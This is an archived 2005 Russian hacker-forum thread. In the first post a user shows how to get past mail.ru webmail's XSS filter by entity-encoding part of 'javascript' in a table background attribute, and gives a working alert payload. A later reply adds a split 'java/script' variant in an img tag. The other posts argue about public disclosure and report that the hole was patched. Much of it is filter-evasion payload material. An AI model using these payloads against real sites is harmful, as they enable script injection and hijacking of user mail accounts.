Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   E-Mail (https://forum.antichat.xyz/forumdisplay.php?f=14)
-   -   xss mail.ru (https://forum.antichat.xyz/showthread.php?t=8919)

Майор 19.08.2005 20:38

xss mail.ru
 
Проверяв систему, я удивлся тому что фильтр раскодирует ASC II и Hex до потери пульса =), т е до того пока в значении атрибута будет встечаться комбинация
Код:

&#
что нам и интересно, ведь если написать
Код:

&#38#97
фильтр преобразует это в букву - a
кусок слова 'javascr' будет выглядить так :
Код:

&#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114
и фильтр не воспримает этот кусок как слово ключевое слово javascript

а XSS бдет выглядеть как то так :
фильтр её пропускает, потому что кусок слова закодирован а конец его - нет
Код:

<table background="&#38#106&#38#97&#38#118&#38#97&#38#115&#38#99&#38#114                ipt:alert('Hi from mayor')">
</table>

// внутри табуляция


PinkPanther 19.08.2005 21:23

Майор, респект за интересную разработку!!! Но, имхо, не туда запостил!

Xattab 19.08.2005 21:44

[~цензура~] Майор...то что доктор прописал


прим ну не на столько я молод =)

qBiN 19.08.2005 21:49

Респект.

Dronga 19.08.2005 22:43

Майор, я тебе уже всё сказал =) Респект в общем. Долго ты меня мучил))

Zadoxlik 19.08.2005 22:53

Майор, молодец, но пожалуй соглашусь с PinkPanther.

NEsTor 20.08.2005 03:02

Имхо о этой баге уже все знали...

Те кто знал, юзал её молча терь ты взял и её разглосил!.... :mad:

Следущий раз думай прежде чем как такие баги выкладывать пожалуйста и другим не гадить.

PinkPanther 20.08.2005 03:28

NEsTor Я понимаю твоё состояние, но тем немение.....оставь всю свою обиду и агрессию при себе.

Майор 20.08.2005 05:34

Цитата:

Сообщение от NEsTor
Имхо о этой баге уже все знали...

Те кто знал, юзал её молча терь ты взял и её разглосил!.... :mad:

Следущий раз думай прежде чем как такие баги выкладывать пожалуйста и другим не гадить.

твоё имхо остаётся при тебе, я данный вид обхода увидил только сегодня
и не указывай что мне делать :)

NEsTor 20.08.2005 06:01

Я тебе не указываю, просто подумай в следущий раз о других когда будешь что то такое ценное выкладывать.

NIGHT_WOLF 20.08.2005 06:14

Найденным нужно делиться. А то это не дело в тихомолку чтобы никто не увидел. Поэтому спасибо что поделился.

NEsTor 20.08.2005 08:12

Ладно не важно, просто Майёр подумай вследущий раз.

всё.

Майор 20.08.2005 14:29

Цитата:

Сообщение от NEsTor
Ладно не важно, просто Майёр подумай вследущий раз.

всё.

вот не надо мне делать замечания, на mail.ru ещё не 1 xss и если у когото не хватате смекалки .... это не мои проблемы :)

SladerNon 20.08.2005 16:52

Майор - молодец!!!

Пинк, и Задохликс =). Ну не всё же ценное прятать по карманам =).
Дайте народу свежей водицы попить! =)

PinkPanther 20.08.2005 18:16

Цитата:

Сообщение от SladerNon
Майор - молодец!!!

Пинк, и Задохликс =). Ну не всё же ценное прятать по карманам =).
Дайте народу свежей водицы попить! =)

Я сам за то чтоб вся информация была бесплатной и общедоступной!!! Это первоначальный манифест хакеров и так должно быть, но тут проблема в том, что уже к понедельнику все будет залатано, ибо сук маил.рушных тут дофига......хотя Майор правду сказал, это ещё не все....)))

VARVAR 21.08.2005 00:05

А здесь вообще все просто:

<img src="java
script: дальше знаете ...

Кто мыслит, тот поймет ! И спасибо Майору !

NEsTor 22.08.2005 08:41

Ладно, вот щас опять закроют багу, и всё!

Нафиг выкладывать был особенно когда знаем, что закроют.

GreenBear 22.08.2005 08:44

И хорошо. Сделаем mail.ru безопасным.
Не все нужно ломать, нужно и оставить то, на чем сидеть.

SladerNon 22.08.2005 15:42

закрыли =).
http://forum.sysadmins.ru/9/48051/?start=90

Stellar - админ майл ру =). Кто уведет у него ящик, тому пива обещал =)

Майор 22.08.2005 18:41

Цитата:

Сообщение от SladerNon
закрыли =).
http://forum.sysadmins.ru/9/48051/?start=90

Stellar - админ майл ру =). Кто уведет у него ящик, тому пива обещал =)

не , у него руки кривые.... посмотри на его пост, это как это тег table в img превратился ?


Время: 02:16